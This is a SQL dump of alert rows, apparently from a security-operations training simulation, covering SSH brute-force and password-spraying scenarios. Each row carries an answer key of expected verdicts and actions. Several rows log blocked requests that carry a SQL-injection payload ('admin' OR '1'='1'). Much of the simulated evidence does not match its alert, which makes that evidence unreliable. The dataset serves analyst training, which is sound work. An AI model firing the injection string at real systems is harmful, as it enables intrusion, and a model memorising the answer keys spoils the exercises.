Forbidden - 
IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1649, 'SSH Brute Force Spike Detected', 'critical', 'Elastic SIEM', 'A significant increase in failed SSH login attempts from an unusual IP address suggests a brute force attack on the network.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:13:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"ssh-server\"}', '2026-03-15 19:36:10', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common administrative account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP\'s history of brute force activity, coupled with the spike in failed attempts, confirms an attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.872Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:13:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.872Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:13:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.872Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:13:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.872Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:13:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.872Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:13:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1650, 'Potential Password Spraying on External Email Service', 'medium', 'Azure Sentinel', 'A number of failed login attempts to the external email service from a specific IP suggests possible password spraying activity.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:45:22Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.2.15\",\"username\":\"user1\",\"hostname\":\"email-server\"}', '2026-03-15 19:36:10', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for suspicious login activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed logins from a known suspicious IP indicate a likely password spraying attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.874Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"email-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.874Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"email-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.874Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"email-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.874Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"email-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.874Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"email-server\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1651, 'False Positive SSH Login Attempt Detected', 'low', 'Wazuh', 'A series of failed SSH login attempts from an internal IP were detected but identified as a false positive due to a misconfigured script.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.200\",\"dst_ip\":\"192.168.1.5\",\"username\":\"testuser\",\"hostname\":\"ssh-server\"}', '2026-03-15 19:36:10', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Test user account used for script operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was traced back to a test script running within the internal network, confirming it as a false positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.877Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.200\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.877Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.200\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.877Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.200\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.877Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.200\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.877Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.200\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"ssh-server\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1652, 'Password Spraying Detected Against Internal Web Portal', 'high', 'Splunk', 'Multiple failed login attempts from a foreign IP address targeting an internal web portal. Possible password spraying attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T02:45:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.100\",\"username\":\"jdoe\",\"hostname\":\"webportal01\",\"failed_attempts\":35}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target web portal\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP has been associated with multiple brute force attacks, confirming this as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.884Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:57:15.884Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:56:15.884Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:55:15.884Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:54:15.884Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T02:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1653, 'SSH Brute Force Spike Detected', 'critical', 'Wazuh', 'A surge in SSH login attempts from an external IP address was detected targeting the server ssh01. Potential brute force attack in progress.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T04:30:22Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.22\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"ssh01\",\"failed_attempts\":50}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for SSH brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target SSH server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is flagged for numerous brute force activities, confirming the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:30:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:57:15.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:30:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:56:15.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:30:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:55:15.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:30:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh01\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:54:15.891Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 
192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:30:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.22\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh01\\\",\\\"failed_attempts\\\":50}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1654, 'Failed Login Attempts from Known Malicious IP', 'medium', 'Azure Sentinel', 'Several failed login attempts detected from a suspicious IP address against the internal authentication server.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:15:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.200\",\"username\":\"m.smith\",\"hostname\":\"authserver01\",\"failed_attempts\":30}', '2026-03-15 19:37:47', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP flagged for multiple unauthorized login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the authentication server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"m.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is known for malicious activities, confirming the attack attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.894Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"m.smith\\\",\\\"hostname\\\":\\\"authserver01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:57:15.894Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"m.smith\\\",\\\"hostname\\\":\\\"authserver01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:56:15.894Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"m.smith\\\",\\\"hostname\\\":\\\"authserver01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:55:15.894Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"m.smith\\\",\\\"hostname\\\":\\\"authserver01\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:54:15.894Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:15:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.50\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"m.smith\\\",\\\"hostname\\\":\\\"authserver01\\\",\\\"failed_attempts\\\":30}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
